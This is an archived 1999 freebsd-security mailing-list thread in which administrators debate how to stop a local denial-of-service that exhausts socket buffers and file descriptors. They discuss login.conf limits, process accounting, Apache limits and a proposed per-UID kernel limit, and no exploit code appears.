for ; Wed, 1 Sep 1999 13:37:53 -0700 (PDT) (envelope-from hibma@skylink.it) Received: from heidi.plazza.it (va-139.skylink.it [194.185.55.139]) by ns.skylink.it (8.9.1/8.8.8) with ESMTP id WAA24245; Wed, 1 Sep 1999 22:38:12 +0200 Received: from localhost (localhost [127.0.0.1]) by heidi.plazza.it (8.9.3/8.8.5) with ESMTP id UAA09006; Wed, 1 Sep 1999 20:19:40 GMT X-No-Spam: Neither the receipients nor the senders email address(s) are to be used for Unsolicited (Commercial) Email without the explicit written consent of either party; as a per-message fee is incurred for inbound and outbound traffic to the originator. Posted-Date: Wed, 1 Sep 1999 20:19:40 GMT Date: Wed, 1 Sep 1999 22:19:40 +0200 (CEST) From: Nick Hibma X-Sender: n_hibma@heidi.plazza.it Reply-To: Nick Hibma To: FreeBSD -- The Power to Serve Cc: Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org That's one of the comments Microsoft makes when a security hole is discovered, switch off that, increase the security level here. It always makes me kind of mad, because that's not what the Joe Average does or is considers something he should do until it's too late. One of the features I like about Unix is for example free space available solely to the root user. It could be imagined that these things also apply to file handles, memory/swap space and other scarce resources. Nick > Exactly what I mean! Limit file descriptors, and it also uses a lot of CPU > time so you can limit that too.. It will never crash the system with the > proper limits set :). They can run it all they want. > > > On Wed, 1 Sep 1999, Mike Tancsa wrote: > > > At 11:49 AM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote: > > >If you have public access users, you should have login accounting in the > > >first place.. and yes, it does stop it :).. I verified this on a 3.2 box > > >with my login accounting setup.. > > > > How does accounting stop it ? Or do you mean it just discourages users > > from doing it ? How much overhead does accounting add to the system ? > > Also, limiting the amount of file descriptors can prevent it, as the 'bug' > > is essentially a resource starving issue (e.g. fork bomb) > > > > ---Mike > > ------------------------------------------------------------------------ > > Mike Tancsa, tel 01.519.651.3400 > > Network Administrator, mike@sentex.net > > Sentex Communications www.sentex.net > > Cambridge, Ontario Canada > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- e-Mail: hibma@skylink.it To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 13:48:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 2611915529 for ; Wed, 1 Sep 1999 13:48:40 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id QAA07324; Wed, 1 Sep 1999 16:46:08 -0400 (EDT) (envelope-from wollman) Date: Wed, 1 Sep 1999 16:46:08 -0400 (EDT) From: Garrett Wollman Message-Id: <199909012046.QAA07324@khavrinen.lcs.mit.edu> To: Nick Hibma Cc: FreeBSD -- The Power to Serve , Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > One of the features I like about Unix is for example free space > available solely to the root user. It could be imagined that these > things also apply to file handles, memory/swap space and other scarce > resources. We have known for some time that the problem originally described exists, but developing an acceptable solution has been a challenge. Now that sockets carry around user credentials, it may perhaps not be as difficult as it used to be. What needs to be done is to impose a per-UID resource limit on the amount of socket buffer space available. What's not clear is: 1) At what level do you impose this limit? 2) Should the limit be statistical or exact? 3) What is a sensible default value? -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 14: 9:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from thetis.deor.org (thetis.quickie.net [206.245.163.5]) by hub.freebsd.org (Postfix) with ESMTP id 4347215A83 for ; Wed, 1 Sep 1999 14:09:04 -0700 (PDT) (envelope-from rabbi@quickie.net) Received: from localhost (rabbi@localhost) by thetis.deor.org (8.9.3/8.9.3) with ESMTP id RAA13738; Wed, 1 Sep 1999 17:08:28 -0400 Date: Wed, 1 Sep 1999 17:08:22 -0400 (EDT) From: "L. Sassaman" To: FreeBSD -- The Power to Serve Cc: Jeff Wheat , freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: Message-ID: X-AIM: Elom777 X-icq: 10735603 X-No-Archive: yes X-PGP: X-PGP-ID-Fprnt: 0x09AC0A6A 7A1A 407F B1CA 7E4E AE85 E730 3D8A F1B2 09AC 0A6A X-PGP-S: X-PGP-ID-Fprnt-S: 0x3AF92BD0 566B 5CA8 A733 34AA A482 586F 38D9 DBA8 3AF9 2BD0 MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wed, 1 Sep 1999, FreeBSD -- The Power to Serve wrote: > If you have public access users, you should have login accounting in the > first place.. and yes, it does stop it :).. I verified this on a 3.2 box > with my login accounting setup.. Okay, tweak the login.conf and you stop users from issuing the attack from the shell. But what about someone who builds the program and uploads it into a cgi-bin? Are we just to stop allowing cgi's to be run if they require higher resource limits? L. Sassaman System Administrator | "Even the most primitive society has Technology Consultant | an innate respect for the insane." icq.. 10735603 | pgp.. finger://ns.quickie.net/rabbi | --Mickey Rourke -----BEGIN PGP SIGNATURE----- Version: GnuPG v0.9.10 (GNU/Linux) Comment: OpenPGP Encrypted Email Preferred. iD8DBQE3zZXMPYrxsgmsCmoRAixFAKD5invyFWxll26tuJxuJ2u7UlNjNQCgiu1b EnM3D/O25Wl+26pXVuRYpWM= =Qeqw -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 15: 1: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from free-bsd.org (edslppp4.dnvr.uswest.net [216.160.128.4]) by hub.freebsd.org (Postfix) with ESMTP id 722F114D9D for ; Wed, 1 Sep 1999 15:01:04 -0700 (PDT) (envelope-from geniusj@free-bsd.org) Received: from localhost (geniusj@localhost) by free-bsd.org (8.9.3/8.9.3) with ESMTP id QAA01966; Wed, 1 Sep 1999 16:04:06 -0600 (MDT) (envelope-from geniusj@free-bsd.org) Date: Wed, 1 Sep 1999 16:04:06 -0600 (MDT) From: FreeBSD -- The Power to Serve To: Mike Tancsa Cc: freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: <3.0.5.32.19990901162052.023c18d0@staff.sentex.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Explain what you mean? That is what login classes are for, you dont have to put "nobody" in a limited class if this is what you mean.. And you can set internal limits in apache if that's what you mean.. I feel you mean either one but I don't know :) On Wed, 1 Sep 1999, Mike Tancsa wrote: > At 02:10 PM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote: > >Exactly what I mean! Limit file descriptors, and it also uses a lot of CPU > >time so you can limit that too.. It will never crash the system with the > >proper limits set :). They can run it all they want. > > Well, that sort of helps for kids just doing ./a.out, but would you put > accounting limits on your web server ? That seems like a nasty can of > configuration worms one would be opening no ? > > ---Mike > > > > > >On Wed, 1 Sep 1999, Mike Tancsa wrote: > > > >> At 11:49 AM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote: > >> >If you have public access users, you should have login accounting in the > >> >first place.. and yes, it does stop it :).. I verified this on a 3.2 box > >> >with my login accounting setup.. > >> > >> How does accounting stop it ? Or do you mean it just discourages users > >> from doing it ? How much overhead does accounting add to the system ? > >> Also, limiting the amount of file descriptors can prevent it, as the 'bug' > >> is essentially a resource starving issue (e.g. fork bomb) > >> > >> ---Mike > >> ------------------------------------------------------------------------ > >> Mike Tancsa, tel 01.519.651.3400 > >> Network Administrator, mike@sentex.net > >> Sentex Communications www.sentex.net > >> Cambridge, Ontario Canada > >> > >> > >> To Unsubscribe: send mail to majordomo@FreeBSD.org > >> with "unsubscribe freebsd-security" in the body of the message > >> > > > > > > > ------------------------------------------------------------------------ > Mike Tancsa, tel 01.519.651.3400 > Network Administrator, mike@sentex.net > Sentex Communications www.sentex.net > Cambridge, Ontario Canada > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 16: 1: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 4708D155A5 for ; Wed, 1 Sep 1999 16:00:54 -0700 (PDT) (envelope-from mike@sentex.net) Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id SAA23466; Wed, 1 Sep 1999 18:58:15 -0400 (EDT) Message-Id: <4.1.19990901190908.04e0af00@granite.sentex.ca> X-Sender: mdtancsa@granite.sentex.ca X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Wed, 01 Sep 1999 19:10:45 -0400 To: FreeBSD -- The Power to Serve From: Mike Tancsa Subject: Re: FW: Local DoS in FreeBSD Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: <3.0.5.32.19990901162052.023c18d0@staff.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 06:04 PM 9/1/99 , FreeBSD -- The Power to Serve wrote: >Explain what you mean? That is what login classes are for, you dont have >to put "nobody" in a limited class if this is what you mean.. And you can >set internal limits in apache if that's what you mean.. I feel you mean >either one but I don't know :) The limits that you have to set for Apache are quite low and restrictive. I am not sure if you can effectivly do this in a large production webserver. There are many cases where users need more than a few file descriptors. ---Mike ********************************************************************** Mike Tancsa, Network Admin * mike@sentex.net Sentex Communications Corp, * http://www.sentex.net/mike Cambridge, Ontario * 01.519.651.3400 Canada * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 16: 1:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 2FF8A155BA for ; Wed, 1 Sep 1999 16:01:15 -0700 (PDT) (envelope-from mike@sentex.net) Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id SAA23633; Wed, 1 Sep 1999 18:59:20 -0400 (EDT) Message-Id: <4.1.19990901191051.04e80570@granite.sentex.ca> X-Sender: mdtancsa@granite.sentex.ca X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Wed, 01 Sep 1999 19:11:51 -0400 To: Garrett Wollman From: Mike Tancsa Subject: Re: FW: Local DoS in FreeBSD Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <199909012046.QAA07324@khavrinen.lcs.mit.edu> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >We have known for some time that the problem originally described >exists, but developing an acceptable solution has been a challenge. >Now that sockets carry around user credentials, it may perhaps not be >as difficult as it used to be. > >What needs to be done is to impose a per-UID resource limit on the >amount of socket buffer space available. Do you think these changes would be incorporated into the 3.x branch, or strictly 4.x ? ---Mike ********************************************************************** Mike Tancsa, Network Admin * mike@sentex.net Sentex Communications Corp, * http://www.sentex.net/mike Cambridge, Ontario * 01.519.651.3400 Canada * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 16: 8:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.ods.org (fbsd2.ods.org [205.252.42.124]) by hub.freebsd.org (Postfix) with SMTP id D91F115BC4 for ; Wed, 1 Sep 1999 16:08:10 -0700 (PDT) (envelope-from geniusj@ods.org) Received: (qmail 48512 invoked by uid 1000); 1 Sep 1999 19:10:25 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 1 Sep 1999 19:10:25 -0000 Date: Wed, 1 Sep 1999 15:10:25 -0400 (EDT) From: Systems Administrator To: Nick Hibma Cc: FreeBSD -- The Power to Serve , Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The average Joe doesn't run FreeBSD ------------------------------------------------------------------------------ Jason DiCioccio | geniusj@free-bsd.org FreeBSD - The Power to Serve | http://www.freebsd.org | http://www.ods.org ------------------------------------------------------------------------------ On Wed, 1 Sep 1999, Nick Hibma wrote: > > That's one of the comments Microsoft makes when a security hole is > discovered, switch off that, increase the security level here. It always > makes me kind of mad, because that's not what the Joe Average does or > is considers something he should do until it's too late. > > One of the features I like about Unix is for example free space > available solely to the root user. It could be imagined that these > things also apply to file handles, memory/swap space and other scarce > resources. > > Nick > > > > Exactly what I mean! Limit file descriptors, and it also uses a lot of CPU > > time so you can limit that too.. It will never crash the system with the > > proper limits set :). They can run it all they want. > > > > > > On Wed, 1 Sep 1999, Mike Tancsa wrote: > > > > > At 11:49 AM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote: > > > >If you have public access users, you should have login accounting in the > > > >first place.. and yes, it does stop it :).. I verified this on a 3.2 box > > > >with my login accounting setup.. > > > > > > How does accounting stop it ? Or do you mean it just discourages users > > > from doing it ? How much overhead does accounting add to the system ? > > > Also, limiting the amount of file descriptors can prevent it, as the 'bug' > > > is essentially a resource starving issue (e.g. fork bomb) > > > > > > ---Mike > > > ------------------------------------------------------------------------ > > > Mike Tancsa, tel 01.519.651.3400 > > > Network Administrator, mike@sentex.net > > > Sentex Communications www.sentex.net > > > Cambridge, Ontario Canada > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > -- > e-Mail: hibma@skylink.it > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 16: 9:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.ods.org (fbsd2.ods.org [205.252.42.124]) by hub.freebsd.org (Postfix) with SMTP id EC86514CD0 for ; Wed, 1 Sep 1999 16:09:52 -0700 (PDT) (envelope-from geniusj@ods.org) Received: (qmail 48525 invoked by uid 1000); 1 Sep 1999 19:12:03 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 1 Sep 1999 19:12:03 -0000 Date: Wed, 1 Sep 1999 15:12:03 -0400 (EDT) From: Systems Administrator To: "L. Sassaman" Cc: FreeBSD -- The Power to Serve , Jeff Wheat , freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If you have it set so that it does SUID for cgi and runs it as the user or uses the users accounting limits, it won't work.. and yes, you should set some sensible apache limits per user on that stuff, I know its possible. ------------------------------------------------------------------------------ Jason DiCioccio | geniusj@free-bsd.org FreeBSD - The Power to Serve | http://www.freebsd.org | http://www.ods.org ------------------------------------------------------------------------------ On Wed, 1 Sep 1999, L. Sassaman wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > On Wed, 1 Sep 1999, FreeBSD -- The Power to Serve wrote: > > > If you have public access users, you should have login accounting in the > > first place.. and yes, it does stop it :).. I verified this on a 3.2 box > > with my login accounting setup.. > > Okay, tweak the login.conf and you stop users from issuing the attack from > the shell. But what about someone who builds the program and uploads it > into a cgi-bin? Are we just to stop allowing cgi's to be run if they > require higher resource limits? > > > > L. Sassaman > > System Administrator | "Even the most primitive society has > Technology Consultant | an innate respect for the insane." > icq.. 10735603 | > pgp.. finger://ns.quickie.net/rabbi | --Mickey Rourke > > > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v0.9.10 (GNU/Linux) > Comment: OpenPGP Encrypted Email Preferred. > > iD8DBQE3zZXMPYrxsgmsCmoRAixFAKD5invyFWxll26tuJxuJ2u7UlNjNQCgiu1b > EnM3D/O25Wl+26pXVuRYpWM= > =Qeqw > -----END PGP SIGNATURE----- > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 16:11:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.ods.org (fbsd2.ods.org [205.252.42.124]) by hub.freebsd.org (Postfix) with SMTP id 49F1F14D7D for ; Wed, 1 Sep 1999 16:11:31 -0700 (PDT) (envelope-from geniusj@ods.org) Received: (qmail 48537 invoked by uid 1000); 1 Sep 1999 19:12:43 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 1 Sep 1999 19:12:43 -0000 Date: Wed, 1 Sep 1999 15:12:43 -0400 (EDT) From: Systems Administrator To: Mike Tancsa Cc: FreeBSD -- The Power to Serve , freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: <4.1.19990901190908.04e0af00@granite.sentex.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yes, they need a few.. but not as many as something like that exploit uses up.. it uses them all.. you shouldn't allow users to do that ------------------------------------------------------------------------------ Jason DiCioccio | geniusj@free-bsd.org FreeBSD - The Power to Serve | http://www.freebsd.org | http://www.ods.org ------------------------------------------------------------------------------ On Wed, 1 Sep 1999, Mike Tancsa wrote: > At 06:04 PM 9/1/99 , FreeBSD -- The Power to Serve wrote: > >Explain what you mean? That is what login classes are for, you dont have > >to put "nobody" in a limited class if this is what you mean.. And you can > >set internal limits in apache if that's what you mean.. I feel you mean > >either one but I don't know :) > > The limits that you have to set for Apache are quite low and restrictive. I > am not sure if you can effectivly do this in a large production webserver. > There are many cases where users need more than a few file descriptors. > > ---Mike > ********************************************************************** > Mike Tancsa, Network Admin * mike@sentex.net > Sentex Communications Corp, * http://www.sentex.net/mike > Cambridge, Ontario * 01.519.651.3400 > Canada * > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 18:12:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 93BBB1563C for ; Wed, 1 Sep 1999 18:12:54 -0700 (PDT) (envelope-from mike@sentex.net) Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id VAA18894; Wed, 1 Sep 1999 21:12:04 -0400 (EDT) Message-Id: <4.1.19990901211618.04e87740@granite.sentex.ca> X-Sender: mdtancsa@granite.sentex.ca X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Wed, 01 Sep 1999 21:24:35 -0400 To: Systems Administrator From: Mike Tancsa Subject: Re: FW: Local DoS in FreeBSD Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 03:12 PM 9/1/99 , Systems Administrator wrote: >If you have it set so that it does SUID for cgi and runs it as the user or >uses the users accounting limits, it won't work.. and yes, you should set >some sensible apache limits per user on that stuff, I know its possible. Ok, are you talking about enabling accouting i.e. in /etc/rc.conf accounting_enable="NO" # Turn on process accounting (or NO). or are you talking about settings in /etc/login.conf ? If login.conf, and internal apache limits, what are you actually setting, and what values ? I found that descriptors had to be VERY restrictive in order to prevent the user from crashing the system. If you have actually implemented protection against this DOS, by all means, please post to the list what you did. However, if you are only theorizing, please state so. ---Mike ********************************************************************** Mike Tancsa, Network Admin * mike@sentex.net Sentex Communications Corp, * http://www.sentex.net/mike Cambridge, Ontario * 01.519.651.3400 Canada * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 18:18: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id F3D6615546 for ; Wed, 1 Sep 1999 18:17:55 -0700 (PDT) (envelope-from mike@sentex.net) Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id VAA19893; Wed, 1 Sep 1999 21:16:43 -0400 (EDT) Message-Id: <4.1.19990901212536.04e852f0@granite.sentex.ca> X-Sender: mdtancsa@granite.sentex.ca X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Wed, 01 Sep 1999 21:29:15 -0400 To: FreeBSD -- The Power to Serve From: Mike Tancsa Subject: Re: FW: Local DoS in FreeBSD Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: <3.0.5.32.19990901162052.023c18d0@staff.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 06:04 PM 9/1/99 , FreeBSD -- The Power to Serve wrote: >Explain what you mean? That is what login classes are for, you dont have >to put "nobody" in a limited class if this is what you mean.. And you can >set internal limits in apache if that's what you mean.. I feel you mean >either one but I don't know :) I mean that putting the web user (in my case user webuser-- a UID <> nobody) in a login.conf set class would seemingly be very restrictive. In my tests, I had to set a user to have less than 16 open files and ~ 5 processes max to prevent them from crashing a 3.x stable box. These sorts of limits to me at first glance would be unworkable in apache. ---Mike > >On Wed, 1 Sep 1999, Mike Tancsa wrote: > >> At 02:10 PM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote: >> >Exactly what I mean! Limit file descriptors, and it also uses a lot of CPU >> >time so you can limit that too.. It will never crash the system with the >> >proper limits set :). They can run it all they want. >> >> Well, that sort of helps for kids just doing ./a.out, but would you put >> accounting limits on your web server ? That seems like a nasty can of >> configuration worms one would be opening no ? >> >> ---Mike >> >> >> > >> >On Wed, 1 Sep 1999, Mike Tancsa wrote: >> > >> >> At 11:49 AM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote: >> >> >If you have public access users, you should have login accounting in the >> >> >first place.. and yes, it does stop it :).. I verified this on a 3.2 box >> >> >with my login accounting setup.. >> >> >> >> How does accounting stop it ? Or do you mean it just discourages users >> >> from doing it ? How much overhead does accounting add to the system ? >> >> Also, limiting the amount of file descriptors can prevent it, as the 'bug' >> >> is essentially a resource starving issue (e.g. fork bomb) >> >> >> >> ---Mike >> >> ------------------------------------------------------------------------ >> >> Mike Tancsa, tel 01.519.651.3400 >> >> Network Administrator, mike@sentex.net >> >> Sentex Communications www.sentex.net >> >> Cambridge, Ontario Canada >> >> >> >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> >> with "unsubscribe freebsd-security" in the body of the message >> >> >> > >> > >> > >> ------------------------------------------------------------------------ >> Mike Tancsa, tel 01.519.651.3400 >> Network Administrator, mike@sentex.net >> Sentex Communications www.sentex.net >> Cambridge, Ontario Canada >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message >> > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > ********************************************************************** Mike Tancsa, Network Admin * mike@sentex.net Sentex Communications Corp, * http://www.sentex.net/mike Cambridge, Ontario * 01.519.651.3400 Canada * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 18:20:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from tasam.com (tasam.com [206.161.83.22]) by hub.freebsd.org (Postfix) with ESMTP id 8EA66155E3 for ; Wed, 1 Sep 1999 18:20:23 -0700 (PDT) (envelope-from clash@tasam.com) Received: from bug (hC6526B25.dhcp.vt.edu [198.82.107.37]) by tasam.com (8.9.3/8.9.3) with SMTP id VAA45852; Wed, 1 Sep 1999 21:19:59 -0400 (EDT) (envelope-from clash@tasam.com) Message-ID: <019d01bef4e1$46125ca0$256b52c6@tasam.com> From: "Joe Gleason" To: "Systems Administrator" , "Nick Hibma" Cc: "FreeBSD -- The Power to Serve" , "Mike Tancsa" , References: Subject: Re: FW: Local DoS in FreeBSD Date: Wed, 1 Sep 1999 21:19:03 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org True, I consider myself an a-typical Joe, but still the point is valid that a FreeBSD should be fairly resiliant and stable without needing to do alot of tweaking. There is also the argument that setting resictions by default could mess up people who don't know to look at the resrictions when something doesn't work. Probably some happy medium could probably be achived. I think I would be happy with a default config in which: The average unprived user could not crash the system, but they could use alot of resources and slow the system down drasticly. Joe Gleason Tasam > The average Joe doesn't run FreeBSD > > > -------------------------------------------------------------------------- ---- > Jason DiCioccio | geniusj@free-bsd.org > FreeBSD - The Power to Serve | http://www.freebsd.org > | http://www.ods.org > -------------------------------------------------------------------------- ---- > > On Wed, 1 Sep 1999, Nick Hibma wrote: > > > > > That's one of the comments Microsoft makes when a security hole is > > discovered, switch off that, increase the security level here. It always > > makes me kind of mad, because that's not what the Joe Average does or > > is considers something he should do until it's too late. > > > > One of the features I like about Unix is for example free space > > available solely to the root user. It could be imagined that these > > things also apply to file handles, memory/swap space and other scarce > > resources. > > > > Nick > > > > > > > Exactly what I mean! Limit file descriptors, and it also uses a lot of CPU > > > time so you can limit that too.. It will never crash the system with the > > > proper limits set :). They can run it all they want. > > > > > > > > > On Wed, 1 Sep 1999, Mike Tancsa wrote: > > > > > > > At 11:49 AM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote: > > > > >If you have public access users, you should have login accounting in the > > > > >first place.. and yes, it does stop it :).. I verified this on a 3.2 box > > > > >with my login accounting setup.. > > > > > > > > How does accounting stop it ? Or do you mean it just discourages users > > > > from doing it ? How much overhead does accounting add to the system ? > > > > Also, limiting the amount of file descriptors can prevent it, as the 'bug' > > > > is essentially a resource starving issue (e.g. fork bomb) > > > > > > > > ---Mike > > > > ------------------------------------------------------------------------ > > > > Mike Tancsa, tel 01.519.651.3400 > > > > Network Administrator, mike@sentex.net > > > > Sentex Communications www.sentex.net > > > > Cambridge, Ontario Canada > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > -- > > e-Mail: hibma@skylink.it > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 1 19: 6:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 1640B14EC0 for ; Wed, 1 Sep 1999 19:06:56 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id TAA27155; Wed, 1 Sep 1999 19:05:38 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id TAA04072; Wed, 1 Sep 1999 19:05:36 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id TAA08666; Wed, 1 Sep 1999 19:05:35 -0700 (PDT) From: Don Lewis Message-Id: <199909020205.TAA08666@salsa.gv.tsc.tdk.com> Date: Wed, 1 Sep 1999 19:05:34 -0700 In-Reply-To: Garrett Wollman "Re: FW: Local DoS in FreeBSD" (Sep 1, 4:46pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Garrett Wollman 